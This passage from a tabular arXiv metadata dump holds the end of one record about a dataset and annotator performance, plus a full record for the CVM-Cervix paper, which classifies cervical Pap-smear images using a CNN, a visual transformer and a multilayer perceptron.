observable in annotator performance. Language distance does not seem to play
any role neither in annotator nor in automatic classification performance. We
release the dataset and the best-performing model under permissive licences.
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 08:45:14 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Mochtak",
"Michal",
""
],
[
"Rupnik",
"Peter",
""
],
[
"Ljubešič",
"Nikola",
""
]
] |
new_dataset
| 0.999698 |
2206.00971
|
Wanli Liu
|
Wanli Liu, Chen Li, Ning Xu, Tao Jiang, Md Mamunur Rahaman, Hongzan
Sun, Xiangchen Wu, Weiming Hu, Haoyuan Chen, Changhao Sun, Yudong Yao, Marcin
Grzegorzek
|
CVM-Cervix: A Hybrid Cervical Pap-Smear Image Classification Framework
Using CNN, Visual Transformer and Multilayer Perceptron
| null | null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Cervical cancer is the seventh most common cancer among all the cancers
worldwide and the fourth most common cancer among women. Cervical cytopathology
image classification is an important method to diagnose cervical cancer. Manual
screening of cytopathology images is time-consuming and error-prone. The
emergence of the automatic computer-aided diagnosis system solves this problem.
This paper proposes a framework called CVM-Cervix based on deep learning to
perform cervical cell classification tasks. It can analyze pap slides quickly
and accurately. CVM-Cervix first proposes a Convolutional Neural Network module
and a Visual Transformer module for local and global feature extraction
respectively, then a Multilayer Perceptron module is designed to fuse the local
and global features for the final classification. Experimental results show the
effectiveness and potential of the proposed CVM-Cervix in the field of cervical
Pap smear image classification. In addition, according to the practical needs
of clinical work, we perform a lightweight post-processing to compress the
model.
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 10:16:07 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Liu",
"Wanli",
""
],
[
"Li",
"Chen",
""
],
[
"Xu",
"Ning",
""
],
[
"Jiang",
"Tao",
""
],
[
"Rahaman",
"Md Mamunur",
""
],
[
"Sun",
"Hongzan",
""
],
[
"Wu",
"Xiangchen",
""
],
[
"Hu",
"Weiming",
""
],
[
"Chen",
"Haoyuan",
""
],
[
"Sun",
"Changhao",
""
],
[
"Yao",
"Yudong",
""
],
[
"Grzegorzek",
"Marcin",
""
]
] |
new_dataset
| 0.994992 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.